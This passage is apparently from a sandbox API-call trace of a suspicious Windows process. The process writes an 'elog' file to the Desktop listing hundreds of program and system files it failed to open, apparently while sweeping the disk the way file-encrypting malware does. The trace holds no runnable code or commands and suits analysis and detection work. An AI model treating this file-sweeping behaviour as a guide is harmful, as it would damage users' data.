Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp\r\nFNF: C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\r\noüü¤Q`JÐ=´ê\x9d\x18\x0c\x08x\x1d5ûɶ\x1aª{t2…,ÈÉ­\x88¦Hå\"¸~U\x939îI\x87Á8\x07W\x8d\x06K\nuà#\x12\x84âRlÞéð\x0eK;ÏM÷]Ök#ª¼7¿>Å\x0fLËÇ\x08#l\x06|\x96+\x1djø\x91ïá\x7f±\x90A\x80©*\x11\x09\x11", lpUsedDefaultChar=0x0) returned 4265 [0285.016] WriteFile (in: hFile=0x2f4, lpBuffer=0x1efb068*, nNumberOfBytesToWrite=0x10a9, lpNumberOfBytesWritten=0x63fe20, lpOverlapped=0x0 | out: lpBuffer=0x1efb068*, lpNumberOfBytesWritten=0x63fe20*=0x10a9, lpOverlapped=0x0) returned 1 [0285.017] CloseHandle (hObject=0x2f4) returned 1 [0285.033] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\elog_460F9943EA70F103.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\elog_460f9943ea70f103.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0285.034] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=16467, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16467 [0285.034] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=16467, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16467 [0285.034] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=16467, lpMultiByteStr=0x1ee8a78, cbMultiByte=16467, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Portable Devices\\regulations_consensus_score.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.UIF.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.DIAGNOSTICS.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\cfc.flights.json\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl\". The process cannot access the file because it is being used by another 